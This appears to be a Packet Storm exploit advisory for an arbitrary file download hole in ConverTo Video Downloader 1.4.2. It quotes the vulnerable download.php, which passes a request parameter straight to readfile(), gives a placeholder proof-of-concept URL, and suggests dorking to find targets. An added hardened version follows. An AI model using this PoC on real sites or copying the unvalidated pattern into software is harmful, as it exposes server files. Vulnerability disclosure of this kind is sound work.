## https://sploitus.com/exploit?id=PACKETSTORM:173898
====================================================================================================================================  
| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) |  
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
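[+] Dorking in Google or another search engine.  
  
[+] Affected file : download.php  
  
[+] Line 5, $file = urldecode($_GET['f']);, takes the file name straight from the request, and line 12, readfile ($file);, sends that file to the client with no validation in between.  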
  
<?php   
if(isset($_GET['f'])){  
  
$siz = convertToBytes($_GET['sz']);  
$file = urldecode($_GET['f']);  
$rand = rand(0,5000);  
header("Content-Description: File Transfer");   
header("Content-Type: application/octet-stream");   
header('Content-Length: ' . $siz);  
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");   
ob_clean(); flush();  
readfile ($file);   
  
}  
  
[+] http://localhost/[PATH]/download.php?f= Ev!l  
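
A hardened form of download.php, as an added example that is not part of the original advisory and is not the vendor's code. It assumes legitimate "f" values are HTTPS URLs on a known set of video hosts; ALLOWED_HOST_SUFFIXES and is_allowed_source() are hypothetical names, and the host suffix is a constructed placeholder.

```php
<?php
// Added example: hardened download.php. Not the vendor's code.
// Assumption: legitimate "f" values are HTTPS URLs on a small set of video
// hosts. ALLOWED_HOST_SUFFIXES is a constructed placeholder list.
const ALLOWED_HOST_SUFFIXES = ['.video-cdn.example'];

function is_allowed_source(string $raw): bool
{
    // $_GET is already URL-decoded by PHP; do not urldecode() a second time.
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;               // bare local paths have no scheme or host
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return false;               // rejects file://, php://, http://, ftp://, ...
    }
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return false;               // no embedded credentials or explicit ports
    }
    $host = strtolower($parts['host']);
    foreach (ALLOWED_HOST_SUFFIXES as $suffix) {
        if (str_ends_with($host, $suffix)) {   // requires PHP 8+
            return true;
        }
    }
    return false;
}

$f = $_GET['f'] ?? '';
if (!is_string($f) || !is_allowed_source($f)) {
    http_response_code(400);
    exit('Invalid source');
}

header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="video_' . random_int(0, 5000) . '.mp4"');
// Content-Length is left out: the original took it from the client-supplied "sz".
// follow_location = 0 so a redirect cannot lead off the allowlist.
$ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 10]]);
readfile($f, false, $ctx);
```
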
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================